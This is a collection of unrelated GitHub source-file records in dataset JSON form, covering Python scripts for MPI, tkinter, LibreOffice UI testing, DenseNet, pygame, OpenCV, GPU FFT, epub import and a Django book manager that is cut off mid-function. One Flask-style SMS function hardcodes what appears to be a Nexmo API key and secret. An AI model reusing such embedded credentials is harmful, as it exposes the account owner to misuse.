i in range(len(arr)):\n sum_value += arr[i]\n if i-start+1 == K:\n max_value = max(max_value,sum_value)\n sum_value -= arr[start]\n start += 1\n answer = max(answer,max_value)\nprint(answer)\n","repo_name":"young0264/hellopycharm","sub_path":"백준/12847_꿀아르바이트.py","file_name":"12847_꿀아르바이트.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71621017445","text":"import numpy as np\r\nfrom mpi4py import MPI \r\nfrom time import time\r\n\r\ncomm = MPI.COMM_WORLD\r\nrank = comm.Get_rank()\r\nnumprocs = comm.Get_size()\r\nparents = numprocs//2 \r\n# assert numprocs == 2\r\n\r\nclass sample:\r\n\r\n def __init__(self) -> None:\r\n self.data = []\r\n self.sum = 0\r\n\r\n def add_data(self, val = 0):\r\n self.data.append(val)\r\n self.sum+=val\r\n \r\n def pop(self):\r\n self.sum-=self.data.pop()\r\n\r\n def print_data(self):\r\n print(\"List:\",self.data, \" Sum:\", self.sum)\r\n\r\n\r\ndef print_time(s, time):\r\n print(\"=\"*5, s, \"=\"*5)\r\n print(time)\r\n print(\"=\"*15)\r\n\r\n\r\nsample_obj = sample()\r\n\r\n\r\ncomm.barrier()\r\n\r\nstart = time()\r\n\r\nif rank == 0:\r\n sample_obj.add_data(rank*10)\r\n sample_obj.add_data(rank*10 + 1)\r\n print(\"Value of object in Process {}\".format(rank))\r\n sample_obj.print_data()\r\n comm.send(sample_obj,dest=1,tag=0)\r\n\r\ncomm.barrier()\r\n\r\nend = time()\r\n\r\nif rank ==0:print(\"time for sending: \",end-start)\r\n\r\ncomm.barrier()\r\n\r\nstart = time()\r\n\r\nif rank == 1:\r\n sample_obj = comm.recv(source = 0, tag = 0)\r\n print(\"Value of object at process {} after receiving from process {}\".format(rank, 0))\r\n sample_obj.print_data()\r\n\r\ncomm.barrier()\r\n\r\nend= time()\r\n\r\nif rank ==0:print(\"time for Receiving: \",end-start)\r\n\r\nif rank ==1:\r\n print(\"changing data at process 1 by popping and adding 1313131\")\r\n sample_obj.pop()\r\n sample_obj.add_data(1313131)\r\n sample_obj.print_data()\r\n","repo_name":"Hemant-60-MSc/Parallel-Computing","sub_path":"MPI/array_sum.py","file_name":"array_sum.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18985429396","text":"\"\"\"\nThe purpose of this program is to provide a method for a user to encode and\nsend a known number set over an unencrypted communications platform.\nUsers on both ends will need to know a predetermined index\nnumber in order to decode the code-string into the correct number.\nThis program takes the user-defined number as input and uses a predetermined\ncode index in order to encode the number into a crypted string. It also\nprovides the option to decode the code-string back into a number.\n\"\"\"\n\nfrom coder_gui import EncodeGui\nimport tkinter as tk\n\n\ndef main():\n window = tk.Tk()\n EncodeGui(window)\n window.mainloop()\n\n\nmain()\n","repo_name":"AnthonyGiusto/Encode_Decode_GUI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29141917140","text":"# -*- tab-width: 4; indent-tabs-mode: nil; py-indent-offset: 4 -*-\n#\n# This file is part of the LibreOffice project.\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\nfrom uitest.framework import UITestCase\nfrom libreoffice.uno.propertyvalue import mkPropertyValues\nfrom uitest.uihelper.common import get_state_as_dict, get_url_for_data_file\n\nclass findReplace(UITestCase):\n def test_find_impress(self):\n with self.ui_test.load_file(get_url_for_data_file(\"findReplace.odp\")) as impress_doc:\n\n # check current slide is 1\n self.assertEqual(impress_doc.CurrentController.getCurrentPage().Number, 1)\n\n self.assertEqual(\"First first first\", impress_doc.DrawPages[0].getByIndex(1).String)\n self.assertEqual(\"second\", impress_doc.DrawPages[1].getByIndex(1).String)\n self.assertEqual(\"Third\", impress_doc.DrawPages[2].getByIndex(1).String)\n self.assertEqual(\"Text size 16\", impress_doc.DrawPages[3].getByIndex(1).String)\n\n # search for string \"second\"\n with self.ui_test.execute_modeless_dialog_through_command(\".uno:SearchDialog\", close_button=\"close\") as xDialog:\n searchterm = xDialog.getChild(\"searchterm\")\n searchterm.executeAction(\"TYPE\", mkPropertyValues({\"TEXT\":\"second\"})) #2nd slide\n xsearch = xDialog.getChild(\"search\")\n xsearch.executeAction(\"CLICK\", tuple())\n\n # verify we moved to slide 2\n self.assertEqual(impress_doc.CurrentController.getCurrentPage().Number, 2)\n\n # search for string \"third\"\n searchterm.executeAction(\"TYPE\", mkPropertyValues({\"KEYCODE\":\"CTRL+A\"}))\n searchterm.executeAction(\"TYPE\", mkPropertyValues({\"KEYCODE\":\"BACKSPACE\"}))\n searchterm.executeAction(\"TYPE\", mkPropertyValues({\"TEXT\":\"third\"}))\n xsearch.executeAction(\"CLICK\", tuple())\n\n #verify we moved to slide 3\n self.assertEqual(impress_doc.CurrentController.getCurrentPage().Number, 3) #3rd slide\n\n self.assertEqual(\"First first first\", impress_doc.DrawPages[0].getByIndex(1).String)\n self.assertEqual(\"second\", impress_doc.DrawPages[1].getByIndex(1).String)\n self.assertEqual(\"Third\", impress_doc.DrawPages[2].getByIndex(1).String)\n self.assertEqual(\"Text size 16\", impress_doc.DrawPages[3].getByIndex(1).String)\n\n # now open dialog and verify find=\"third\" (remember last value);\n # replace value with \"First\" (click match case) with word \"Replace\"\n # click twice the Replace button, check \"Replace first first\"\n\n # open the dialog again\n with self.ui_test.execute_modeless_dialog_through_command(\".uno:SearchDialog\", close_button=\"close\") as xDialog:\n\n # verify search string is still \"third\" from previous search\n searchterm = xDialog.getChild(\"searchterm\")\n self.assertEqual(get_state_as_dict(searchterm)[\"Text\"], \"third\")\n\n # replace it with \"First\"\n searchterm.executeAction(\"TYPE\", mkPropertyValues({\"KEYCODE\":\"CTRL+A\"}))\n searchterm.executeAction(\"TYPE\", mkPropertyValues({\"KEYCODE\":\"BACKSPACE\"}))\n searchterm.executeAction(\"TYPE\", mkPropertyValues({\"TEXT\":\"First\"}))\n\n # click \"match case\"\n matchcase = xDialog.getChild(\"matchcase\")\n matchcase.executeAction(\"CLICK\", tuple()) #click match case\n\n # set the replace string to \"Replace\"\n replaceterm = xDialog.getChild(\"replaceterm\")\n replaceterm.executeAction(\"TYPE\", mkPropertyValues({\"TEXT\":\"Replace\"})) #replace textbox\n\n # hit replace button 2 times\n replace = xDialog.getChild(\"replace\")\n\n replace.executeAction(\"CLICK\", tuple())\n replace.executeAction(\"CLICK\", tuple()) #click twice Replace button (one selects, second replaces)\n\n # now replace first (uncheck match case) with word \"aaa\" - click once Replace All button, check \"Replace aaa aaa\"\n matchcase = xDialog.getChild(\"matchcase\")\n matchcase.executeAction(\"CLICK\", tuple()) # uncheck match case\n\n self.assertEqual(\"Replace first first\", impress_doc.DrawPages[0].getByIndex(1).String)\n self.assertEqual(\"second\", impress_doc.DrawPages[1].getByIndex(1).String)\n # tdf#145868 - Third was search for earlier, but never should have been replaced\n self.assertEqual(\"Third\", impress_doc.DrawPages[2].getByIndex(1).String)\n self.assertEqual(\"Text size 16\", impress_doc.DrawPages[3].getByIndex(1).String)\n\n replaceterm = xDialog.getChild(\"replaceterm\")\n replaceterm.executeAction(\"TYPE\", mkPropertyValues({\"KEYCODE\":\"CTRL+A\"}))\n replaceterm.executeAction(\"TYPE\", mkPropertyValues({\"KEYCODE\":\"BACKSPACE\"}))\n replaceterm.executeAction(\"TYPE\", mkPropertyValues({\"TEXT\":\"aaa\"}))\n replaceall = xDialog.getChild(\"replaceall\")\n replaceall.executeAction(\"CLICK\", tuple()) # click on replace all button\n\n self.assertEqual(impress_doc.CurrentController.getCurrentPage().Number, 1)\n\n # tdf#122788: Without the fix in place, this test would have failed with\n # AssertionError: 'Replace aaa aaa' != 'Replace first first'\n self.assertEqual(\"Replace aaa aaa\", impress_doc.DrawPages[0].getByIndex(1).String)\n self.assertEqual(\"second\", impress_doc.DrawPages[1].getByIndex(1).String)\n self.assertEqual(\"Third\", impress_doc.DrawPages[2].getByIndex(1).String)\n self.assertEqual(\"Text size 16\", impress_doc.DrawPages[3].getByIndex(1).String)\n\n# vim: set shiftwidth=4 softtabstop=4 expandtab:\n","repo_name":"LibreOffice/core","sub_path":"sd/qa/uitest/findReplace/findReplace.py","file_name":"findReplace.py","file_ext":"py","file_size_in_byte":6059,"program_lang":"python","lang":"en","doc_type":"code","stars":2194,"dataset":"github-code","pt":"52"} +{"seq_id":"10692057270","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom collections import OrderedDict\n\nclass _Transition(nn.Module):\n def __init__(self, in_channels, out_channels, dropout):\n super().__init__()\n\n self.layer = nn.Sequential(\n nn.BatchNorm2d(in_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False),\n nn.AvgPool2d(2, stride=2)\n )\n self.dropout = dropout\n\n def forward(self, input):\n out = self.layer(input)\n if self.dropout > 0.:\n out = F.dropout(out, p=self.dropout)\n return out\n\nclass _DenseBLayer(nn.Module):\n def __init__(self, in_channels, growth_rate, dropout):\n super().__init__()\n\n self.layer = nn.Sequential(\n nn.BatchNorm2d(in_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(in_channels, 4*growth_rate, kernel_size=1, bias=False),\n nn.BatchNorm2d(4*growth_rate),\n nn.ReLU(inplace=True),\n nn.Conv2d(4*growth_rate, growth_rate, kernel_size=3, padding=1, bias=False)\n )\n self.dropout = dropout\n\n def forward(self, input):\n out = self.layer(input)\n out = torch.cat([out, input], 1)\n if self.dropout > 0.:\n out = F.dropout(out, p=self.dropout)\n return out\n\nclass _DenseBlock(nn.Module):\n def __init__(self, num_layers, growth_rate, in_channels, dropout):\n super().__init__()\n\n self.bottleneck = nn.Sequential(OrderedDict([(\"dbl_{}\".format(l),\n _DenseBLayer(in_channels + growth_rate*l, growth_rate, dropout)) for l in range(num_layers)]))\n\n def forward(self, input):\n return self.bottleneck(input)\n\nclass DenseNet(nn.Module):\n def __init__(self, args):\n super().__init__()\n\n self.init_cnn_layer = nn.Sequential(OrderedDict([\n ('conv0', nn.Conv2d(3, args.channels, kernel_size=3, padding=1, bias=False)),\n ('norm0', nn.BatchNorm2d(args.channels)),\n ('relu0', nn.ReLU(inplace=True))\n ]))\n\n denseblocks = []\n for l, nums in enumerate(args.layer_nums):\n denseblocks += [(\"db_{}\".format(l), _DenseBlock(nums, args.growth_rate, args.channels, args.dropout))]\n _in_channels = args.channels + args.growth_rate*nums\n args.channels = _in_channels // 2\n if l != len(args.layer_nums)-1:\n denseblocks += [(\"t_{}\".format(l), _Transition(_in_channels, args.channels, args.dropout))]\n\n denseblocks += [(\"nb_5\", nn.BatchNorm2d(_in_channels))]\n denseblocks += [(\"relu_5\", nn.ReLU(inplace=True))]\n\n if args.dropout != 0.:\n denseblocks += [(\"dropout_5\", nn.Dropout(args.dropout))]\n\n self.denseblocks = nn.Sequential(OrderedDict(denseblocks))\n\n self.lr = nn.Linear(_in_channels, args.num_class)\n self.lr.bias.data.fill_(0)\n\n def forward(self, input):\n out = self.init_cnn_layer(input)\n out = self.denseblocks(out)\n out = F.avg_pool2d(out, 8).squeeze()\n return self.lr(out)\n","repo_name":"ne7ermore/torch-light","sub_path":"DenseNet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":526,"dataset":"github-code","pt":"52"} +{"seq_id":"36460317773","text":"\nmath = {\n \"a\": 35,\n \"b\": 36,\n \"c\": 40,\n \"d\": 44,\n}\n\nprint(\"if x = 8, then what is value of 4(x+3) ?\")\nfor n,m in math.items():\n print(n,\":\", m)\nwhile True:\n a = input(\"Enter your answer:\")\n if a == \"d\":\n print(\"Correct\")\n break\n else:\n print(\"Wrong. Pls answer again!!!\")\n","repo_name":"Mdat1610/ngominhdat-c4e34","sub_path":"New folder/baitapbuoi4/EX3.py","file_name":"EX3.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33637453210","text":"import random\n\nwith open('sowpods.txt', 'r') as sp:\n content = sp.read().split()\n\n\ndef rand_word():\n rand = random.choice(content)\n return rand.lower()\n\n\ndef rand_sentence():\n sentence_len = random.randint(4, 13)\n sen = ''\n sen += rand_word().title()\n for i in range(sentence_len - 1):\n sen += \" \" + rand_word()\n sen += '. '\n return sen\n\n\ndef gibber_gener():\n rand_amount = random.randint(4, 8)\n para = input(\"Number of paragraphs: \")\n if para.isnumeric():\n para = int(para)\n for i in range(para):\n print('\\n')\n x = ''\n for i in range(rand_amount):\n x += rand_sentence()\n print(x.strip())\n else:\n gibber_gener()\n\n\ngibber_gener()\n","repo_name":"JSBCCA/pythoncode","sub_path":"exercises/gibberish.py","file_name":"gibberish.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14026610946","text":"import os\nfrom io import BytesIO\nfrom tempfile import NamedTemporaryFile\n\nfrom ebooklib import epub\nfrom PIL import Image\n\nfrom config import IMAGES_PATH\nfrom importers.base import (\n BookImporter,\n BookMetadata,\n)\n\n\nclass EpubImporter(BookImporter):\n FORMAT = 'epub'\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.book = None\n\n def get_metadata(self):\n self.book = self._get_temp_ebook()\n\n title = self.book.get_metadata(\"DC\", 'title')[0][0]\n\n extended_title = ''\n try:\n extended_title = self.book.get_metadata(\"DC\", 'extended-title')[1][0]\n except IndexError:\n pass\n title = title if len(title) >= len(extended_title) else extended_title\n\n authors = self._get_authors()\n\n publisher = None\n try:\n publisher = self.book.get_metadata(\"DC\", \"publisher\")[0][0]\n except IndexError:\n pass\n\n languages = [language[0] for language in self.book.get_metadata(\"DC\", \"language\")]\n\n published_date = None\n try:\n published_date = self.book.get_metadata(\"DC\", \"date\")[0][0]\n except IndexError:\n pass\n\n description = ''\n try:\n description = self.book.get_metadata(\"DC\", \"description\")[0][0]\n except IndexError:\n pass\n\n tags = []\n\n return BookMetadata(\n authors=authors,\n title=title,\n description=description,\n publisher=publisher,\n languages=languages,\n published_date=published_date,\n tags=tags\n )\n\n def extract_cover(self):\n filename = None\n\n try:\n cover_item_filename = self.book.get_metadata('OPF', 'cover')[0][1]['content']\n except (IndexError, KeyError):\n cover_item_filename = ''\n\n for item in self.book.get_items():\n if (\n 'cover' in item.file_name.lower() or 'cover' in item.id or cover_item_filename == item.file_name) and item.media_type in [\n 'image/jpeg',\n 'image/png',\n ]:\n filename = self._cover_filename\n path = os.path.join(IMAGES_PATH, filename)\n cover_image = item.get_content()\n image = Image.open(BytesIO(cover_image))\n if image.mode == 'RGBA':\n image = image.convert('RGB')\n image.save(path)\n break\n\n return filename\n\n def _get_authors(self):\n authors = [contributor[0] for contributor in self.book.get_metadata(\"DC\", \"creator\")]\n cleaned_authors = []\n for author in authors:\n if ' and ' in author:\n and_authors = author.split(' and ')\n cleaned_authors.extend(and_authors)\n else:\n cleaned_authors.append(author)\n authors = cleaned_authors\n return authors\n\n def _get_temp_ebook(self):\n with NamedTemporaryFile(delete=False) as temp_file:\n while True:\n chunk = self.file.file.read(1024)\n if not chunk:\n break\n temp_file.write(chunk)\n return epub.read_epub(temp_file.name)\n","repo_name":"AlexeyYurko/BookVault","sub_path":"importers/epub.py","file_name":"epub.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22867153287","text":"# game options/settings\nimport pygame as pg\nimport json\nfrom os import path\n\n# define colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (200, 0, 0)\nGREEN = (0, 255, 0)\nLIGHT_GREEN = (0, 200, 0)\nLIGHT_BLACK = (60, 60, 55)\nDARK_GREY = (40, 40, 40)\nLIGHTGREY = (100, 100, 100)\nDOWN_RED = (216, 40, 35)\nBLUE = (0, 0, 200)\nYELLOW = (255, 255, 0)\nLIGHTBLUE = (0, 155, 155)\nFUCHSIA = (255, 0, 255)\nCOLORKEY = (34, 177, 76)\n\n\nTITLE = \"Zombie\"\nWIDTH = 800 #1024\nHEIGHT = 640 #800\nTILESIZE = 40\nBGCOLOR = DARK_GREY\nFPS = 60\nGAME_FOLDER = path.dirname(__file__)\nIMAGE_FOLDER = path.join(GAME_FOLDER, \"img\")\nIMAGE_KEY = \"Images\"\n\n#Load Data\nDATAFILE = path.join(path.join(GAME_FOLDER, \"data\"), \"data.json\")\nwith open(DATAFILE) as json_data:\n GAMEDATA = json.load(json_data)\n\n#Intro Settings\nINTRO_TITLE = \"DOOM KINGDOM\"\nINTRO_FOLDER = path.join(IMAGE_FOLDER, \"Background\")\n\n#Map Settings\nMAP_FOLDER = path.join(IMAGE_FOLDER, \"Maps\")\nTILEDMAP_FOLDER = path.join(MAP_FOLDER, \"Act_1\")\n\n# Player Settings\nPLAYER_KEY = \"Player\"\nPLAYER_SPEED = 200\nPLAYER_HIT_RECT = pg.Rect(0, 0, 32, 32)\nPLAYER_CLASS = \"Warrior\"\nPLAYER_LETTER = \"P\"\n\n#Player Image Settings\nPLAYER_EQUIPMENT = \"Light Armor with Sword & Shield\"\nPLAYER_SPRITESHEET_GENERATOR = \"%s in %s.png\"\nPLAYER_FOLDER = path.join(IMAGE_FOLDER, \"Class\")\nPLAYER_CLASS_FOLDER = path.join(PLAYER_FOLDER, PLAYER_CLASS)\n\n# Mob Settings\nMOB_KEY = \"Mob\"\nMOB_SPEED = 100\nMOB_HIT_RECT = pg.Rect(0, 0, 32, 32)\nMOB_LETTER = \"M\"\n\n# Mob Image Settings\nMOB_FOLDER = path.join(IMAGE_FOLDER, \"Enemies\")\nMOB_FILETYPE = \"%s.png\"\n\n# HUD Folder\nHUD_FOLDER = path.join(IMAGE_FOLDER, \"HUD\")\n","repo_name":"Ricardo232/IS2-Grupo-F-Entregable-5","sub_path":"IngenieriaSoftwareII-desarrollo/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4382546687","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport pika\nimport sys\n\nhostname = 'localhost'\nparameters = pika.ConnectionParameters(hostname)\nconnection = pika.BlockingConnection(parameters)\n\n# 创建通道\nchannel = connection.channel()\n# 定义交换机,设置类型为direct\nchannel.exchange_declare(exchange='change_dir', exchange_type='direct')\n\n# 从命令行获取路由键参数,如果没有,则设置为info\nroutings = sys.argv[1:]\nif not routings:\n routings = ['info']\n\n# 生成临时队列,并绑定到交换机上,设置路由键\n# ,durable=True\nresult = channel.queue_declare(queue='666', exclusive=True)\nqueue_name = result.method.queue\nfor routing in routings:\n channel.queue_bind(exchange='change_dir', queue=queue_name, routing_key=routing)\n\n\ndef callback(ch, method, properties, body):\n print(\" [x] Received %r\" % (body,))\n\n\nchannel.basic_consume(queue_name, callback, True)\n\nprint(' [*] Waiting for messages. To exit press CTRL+C')\nchannel.start_consuming()\n","repo_name":"Thousandhack/middleware_demo_python","sub_path":"rabbit_dmeo/demo_direct/receiver_demo_01.py","file_name":"receiver_demo_01.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27958131614","text":"from fuzzywuzzy import fuzz\n\nfrom scripts.helpers.FileHelper import FileHelper\n\n\n# Tests realized between: ratio(), partial_ratio(), token_set_ratio(), token_sort_ratio(), partial_token_set_ratio(),\n# partial_token_sort_ratio()\n\n\ndef is_name_similar(name1: str, name2: str) -> int:\n if name1 in name2 or name2 in name1:\n return 100\n return fuzz.token_set_ratio(name1, name2)\n\n\n# The address can be completely different, since the restaurant can have changed location\ndef is_address_similar(address1: str, address2: str) -> int:\n return fuzz.token_set_ratio(address1, address2)\n\n\n# The citys can be different\n# Receive the key for the city\ndef is_city_similar(city1: str, city2: str) -> int:\n if city1 == city2:\n return 100\n else:\n return 0\n\n\n# The phone can be completely differente\ndef is_phone_similar(phone1: str, phone2: str) -> int:\n return fuzz.ratio(phone1, phone2)\n\n\n# The type can be different\n# Receive the key for the type\ndef is_type_similar(t1: str, t2: str) -> int:\n if t1 == t2:\n return 100\n else:\n return 0\n\n\n# Compare docs based on a weight system\n\nnameWeight = 5\ncityWeight = 4\nphoneWeight = 3\naddressWeight = 2\ntypeWeight = 1\n\n\ndef is_doc_similar(doc1: dict, doc2: dict) -> int:\n result_name = is_name_similar(doc1['name'], doc2['name'])\n result_city = is_city_similar(doc1['cityKey'], doc2['cityKey'])\n result_phone = is_phone_similar(doc1['phone'], doc2['phone'])\n result_address = is_address_similar(doc1['address'], doc2['address'])\n result_type = is_type_similar(doc1['typeKey'], doc2['typeKey'])\n total = (result_name * nameWeight) + (result_city * cityWeight) + (result_phone * phoneWeight) + (\n result_address * addressWeight) + (result_type * typeWeight)\n return total\n\n\n# Find adequate method to compare two strings\ndef find_adequate_method(category: str, comparator_method: staticmethod, cleaner_method: staticmethod):\n file = '../restaurants.tsv'\n golden_standart = '../golden_standart.tsv'\n\n file_helper = FileHelper(file, '\\t')\n file_list = list(filter(lambda r: int(r['id']) <= 224, file_helper.read_file()))\n file_helper = FileHelper(golden_standart, '\\t')\n golden_list = file_helper.read_file()\n res = []\n for standart in golden_list:\n id1 = int(standart['id1']) - 1\n id2 = int(standart['id2']) - 1\n item1 = cleaner_method(file_list[id1][category])\n item2 = cleaner_method(file_list[id2][category])\n result = comparator_method(item1, item2)\n if result != 100:\n res.append('{}|{}:{}'.format(id1, id2, result))\n print(res)\n","repo_name":"aylton-almeida/DuplicateDetectionAlgorithm","sub_path":"scripts/utils/DocComparator.py","file_name":"DocComparator.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42435947","text":"# 仿射变换\nimport cv2\nimport numpy as np\nimport math\n\nimg = cv2.imread(\"1.jpg\")\nrows, cols, channals = img.shape\nprint()\n# 沿X,Y轴平移50\n# M = np.float32([[1, 0, 50], [0, 1, 50]])\n# 将图片的高和宽都缩小一半\n# M = np.float32([[0.5, 0, 0], [0, 0.5, 0]])\n# 将图片逆时针旋转10°\n# M = np.float32([[math.cos(math.radians(10)), math.sin(math.radians(10)), 0],\n# [-math.sin(math.radians(10)), math.cos(math.radians(10)), 0]])\n# 将图片进行方向剪切\n# M = np.float32([[1, 0, 0], [2, 1, 0]])\n\n#自动得到需要的变换矩阵 第一个参数为旋转的中心,第二个参数为旋转的度数,第三个参数为缩放的比例因子\nM = cv2.getRotationMatrix2D((cols/2,rows/2), 0, 2)\n\nimg = cv2.warpAffine(img, M, (cols, rows))\n\ncv2.imshow(\"img\", img)\ncv2.waitKey(0)\n","repo_name":"852251748/practiceCode","sub_path":"Openstudy/affine.py","file_name":"affine.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16831756395","text":"import nexmo\nfrom flask import jsonify\nimport os\n\ndef send_sms(request):\n if request.method == 'POST':\n os.environ['BUTTON'] = 'TRUE'\n data = request.get_json()\n\n client = nexmo.Client(key='4239626e', secret='S8hJeMKRUzW6l5Jt')\n \n msg = \"Hey, killSwitch is turning off your mic and camera. Enjoy your break!\" \n\n # you need some more data checking here. just an example...\n args = {\n 'from': '18077883740',\n 'to': data['phone'],\n 'text': msg\n }\n \n response = client.send_message(args)\n return jsonify(response)\n\n elif request.method == 'GET':\n response = os.environ.get('BUTTON', 'Specified environment variable is not set.')\n os.environ['BUTTON'] = 'FALSE'\n return jsonify(response)\n","repo_name":"AliNaqvi01/KillSwitch","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25211224664","text":"#!/usr/bin/python\nimport cgi\nimport base\nimport home_page_list\nimport module_functions\nfrom connect import connect\n\n# Deal with URL arguments:\nform = cgi.FieldStorage()\ncard_id = base.cleanCGInumber(form.getvalue('card_id'))\nserial_num = base.cleanCGInumber(form.getvalue('serial_num'))\n\n# Print basic HTML stuff:\nbase.begin()\nbase.header(title='ATD: Board {0}'.format(serial_num))\t\t# Print the header\nbase.top()\n#print 'card_id = ', card_id\n#print 'serial_num = ', serial_num\n\nmodule_functions.add_test_tab(serial_num, card_id)\n\nrevokes=module_functions.Portage_fetch_revokes(serial_num)\n\ndb = connect(0)\ncur = db.cursor()\n\ncur.execute(\"SELECT test_type, name FROM Test_Type WHERE required = 1 order by relative_order ASC\")\nfor test_type in cur:\n\ttest_type_id=test_type[0]\n\ttest_name=test_type[1]\n\tattempts = module_functions.Portage_fetch(test_type_id, serial_num) \n\tmodule_functions.ePortageTest(test_type_id, serial_num, test_name, revokes , attempts)\n\nmodule_functions.moduleNotesDump( serial_num )\n\nmodule_functions.export_to_xml(serial_num, card_id)\n\nbase.bottom()\n","repo_name":"yw5mj/hcaltsbackup","sub_path":"cgi-bin/ePortage/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37999210198","text":"import sys\nfrom PySide6.QtCore import QFile, QIODevice\nfrom PySide6.QtUiTools import QUiLoader\nfrom PySide6.QtWidgets import QMainWindow\n\n\nclass Window(QMainWindow):\n def __init__(self):\n super().__init__()\n\n def windowInit(self, uiFileName, where=None):\n uiFile = QFile(uiFileName)\n if not uiFile.open(QIODevice.ReadOnly):\n print(f\"Cannot open {uiFileName}: {uiFile.errorString()}\")\n sys.exit(-1)\n loader = QUiLoader()\n window = loader.load(uiFile, where)\n uiFile.close()\n if not window:\n print(loader.errorString())\n sys.exit(-1)\n window.show()\n return window\n","repo_name":"srafique98/SWEProject","sub_path":"src/Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13743109156","text":"import cupy as cp\nimport cupyx.scipy.fft as cufft\nimport numpy as np\nimport time\n\n\nsize = 10000\nsignal = np.random.rand(size, size)\nkernel = np.random.rand(size, size)\nstart_time = time.time()\n# 將數據移動到GPU內存\nsignal_gpu = cp.asarray(signal)\nkernel_gpu = cp.asarray(kernel)\n\n# 將核心陣列以零值填充,使其大小與信號陣列相同\npadded_kernel_gpu = cp.pad(kernel_gpu, ((0, signal.shape[0] - kernel.shape[0]), \n (0, signal.shape[1] - kernel.shape[1])), mode='constant')\nkernel_freq_gpu = cufft.fftn(padded_kernel_gpu)\n\n\n# 在GPU上進行傅立葉轉換\nsignal_freq_gpu = cufft.fftn(signal_gpu)\n\n# 在GPU上進行逐點相乘\nproduct_freq_gpu = signal_freq_gpu * kernel_freq_gpu\n\n# 在GPU上進行逆傅立葉轉換\nproduct_gpu = cufft.ifftn(product_freq_gpu)\nend_time = time.time()\nfft_conv_time = end_time - start_time\n# 將結果移回主機內存\nproduct = cp.asnumpy(product_gpu)\n\n# 返回結果\nprint(f\"GPU FFT time: {fft_conv_time:.6f} seconds\")","repo_name":"Ben0126/Matlab_call_Python_conv2D","sub_path":"gpu_fft_YJ.py","file_name":"gpu_fft_YJ.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11612346532","text":"from django.shortcuts import render, HttpResponse, redirect\nimport json\nfrom django.core import serializers\n\n\nfrom bms.models import *\n\n\ndef test(request):\n\n a = Books.objects.filter(id=9)\n print(a)\n return HttpResponse('OK')\n\n\ndef show(request):\n books = []\n book_list = Books.objects.all()\n for item in book_list:\n dist = {}\n author = ''\n bk = Books.objects.filter(id=item.id).first()\n publish = bk.publishb.pname\n authors = bk.authors.all()\n for i in authors:\n author += (i.aname+',')\n dist['id'] = item.id\n dist['title'] = item.title\n dist['price'] = item.price\n dist['pub_date'] = item.pub_date\n dist['publish'] = publish\n dist['author'] = author[:-1]\n\n books.append(dist)\n\n return render(request, 'bms/show_book_bases.html', {'books': books,})\n\n\ndef add(request):\n\n if request.method == 'POST':\n title = request.POST.get('title')\n pub_date = request.POST.get('pub_date')\n price = request.POST.get('price')\n pub = Publish.objects.filter(pname=request.POST.getlist('publish')[0]).first()\n book = Books.objects.create(title=title, pub_date=pub_date, price=price, publishb_id=pub.pid)\n author_l = request.POST.getlist('author')\n for i in author_l:\n aid = i.split(':')[1]\n author = Authors.objects.filter(aid=aid).first()\n book.authors.add(author)\n\n return redirect('/bms/show')\n else:\n \n publish = Publish.objects.all()\n author = Authors.objects.all()\n \n return render(request, 'bms/add_books.html', {'publish': publish, 'authors': author})\n\n\ndef delete(request, b_id):\n\n Books.objects.filter(id=b_id).delete()\n\n return redirect('/bms/show/')\n\n\ndef change(request):\n\n if request.method == 'POST':\n\n data = json.loads(request.body)\n\n b_id = data.get('book_id')\n pub_date = data.get('pub_date')\n price = data.get('price')\n pub = Publish.objects.filter(pname=data.get('pubs')[0]).first()\n Books.objects.filter(id=b_id).update(title=data.get('title'), pub_date=pub_date, price=price, publishb_id=pub.pid)\n author_l = data.get('author')\n book = Books.objects.filter(id=b_id).first()\n book.authors.clear()\n for i in author_l:\n aid = i.split(':')[1]\n author = 